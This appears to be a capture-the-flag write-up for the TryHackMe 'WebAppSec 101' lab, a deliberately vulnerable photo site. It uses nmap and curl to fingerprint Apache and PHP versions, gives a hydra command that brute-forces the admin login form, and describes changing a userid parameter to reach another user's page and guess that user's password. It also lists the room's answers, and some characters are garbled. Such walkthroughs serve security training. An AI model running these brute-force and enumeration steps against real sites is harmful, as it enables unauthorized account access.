I"Ì<p>It‚Äôs a write-up about the room : <a href="https://tryhackme.com/room/webappsec101">Try Hack Me - Room : WebAppSec 101</a></p>

<h1 id="task-2---walking-through-the-application">[Task 2] - Walking through the application</h1>

<ul>
  <li>What version of Apache is being used?</li>
</ul>

<p>We used nmap to know ports opened : <code class="language-plaintext highlighter-rouge">nmap -sV -A ip_machine</code></p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
</pre></td><td class="rouge-code"><pre>PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 54:04:09:42:d3:f4:07:d7:9c:e9:30:93:72:94:61:29 (RSA)
|   256 b3:a0:94:10:30:fe:f8:3b:73:72:52:b4:c2:6b:22:3d (ECDSA)
|_  256 35:86:be:66:ea:d2:ac:63:40:3d:f5:94:88:3c:83:5d (ED25519)
80/tcp  open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: WackoPicko.com
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          43061/tcp   status
|   100024  1          45246/udp6  status
|   100024  1          45747/tcp6  status
|_  100024  1          57246/udp   status
</pre></td></tr></tbody></table></code></pre></div></div>

<p>The version of Apached used is <strong>2.4.7</strong>.</p>

<ul>
  <li>
    <p>What language was used to create the website? <strong>php</strong></p>
  </li>
  <li>
    <p>What version of this langage is used ?</p>
  </li>
</ul>

<p>We ran : <code class="language-plaintext highlighter-rouge">curl -I http://10.10.55.117</code> to have some information about the website.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
</pre></td><td class="rouge-code"><pre>HTTP/1.1 200 OK
Date: Sat, 22 Aug 2020 12:06:44 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.24
Set-Cookie: PHPSESSID=oevcaecn9fkftt2ceg43rh2qj0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
</pre></td></tr></tbody></table></code></pre></div></div>

<p>The version oh php used is <strong>5.5.9</strong>.</p>

<h1 id="task-4---authentication">[Task 4] - Authentication</h1>

<ul>
  <li>
    <p>What is the admin username? <strong>admin</strong></p>
  </li>
  <li>
    <p>What is the admin password?</p>
  </li>
</ul>

<p>We used hydra on kali linux to bruteforce the password :</p>

<p>`hydra -l admin -P /usr/share/dirb/wordlists/small.txt ip_machine http-post-form ‚Äú/admin/login.php:username=^USER^&amp;password=^PASS^&amp;Login=Login:Login failed‚Äù -V</p>

<ul>
  <li>
    <p>What is the name of the cookie that can be manipulated? <strong>session</strong></p>
  </li>
  <li>
    <p>What is the name of the cookie that can be manipulated?</p>
  </li>
</ul>

<p>After created an account, we could see that we could change the user with a number <code class="language-plaintext highlighter-rouge">ip_machine/users/sample.php?userid=1</code>. We changed the number to 11 and found the user <strong>Bryce</strong>.</p>

<ul>
  <li>What is the corresponding password to the username?</li>
</ul>

<p>We tried <strong>bryce</strong> as password and it worked.</p>
:ET